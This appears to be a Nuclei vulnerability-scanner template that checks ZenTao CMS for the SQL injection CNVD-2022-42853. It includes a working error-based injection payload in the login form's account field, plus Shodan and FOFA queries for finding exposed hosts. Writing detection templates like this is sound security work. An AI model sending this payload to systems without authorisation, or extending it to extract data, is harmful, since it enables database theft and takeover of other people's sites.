id: CNVD-2022-42853 info: name: ZenTao CMS - SQL Injection author: ling severity: critical description: | ZenTao CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. reference: - https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go - https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-89 metadata: verified: true shodan-query: http.title:"zentao" fofa-query: "Zentao" tags: cnvd,cnvd2022,zentao,sqli variables: num: "999999999" requests: - raw: - | POST /zentao/user-login.html HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/zentao/user-login.html account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1 matchers: - type: word part: body words: - 'c8c605999f3d8352d7bb792cf3fdb25' # Enhanced by mp on 2022/09/28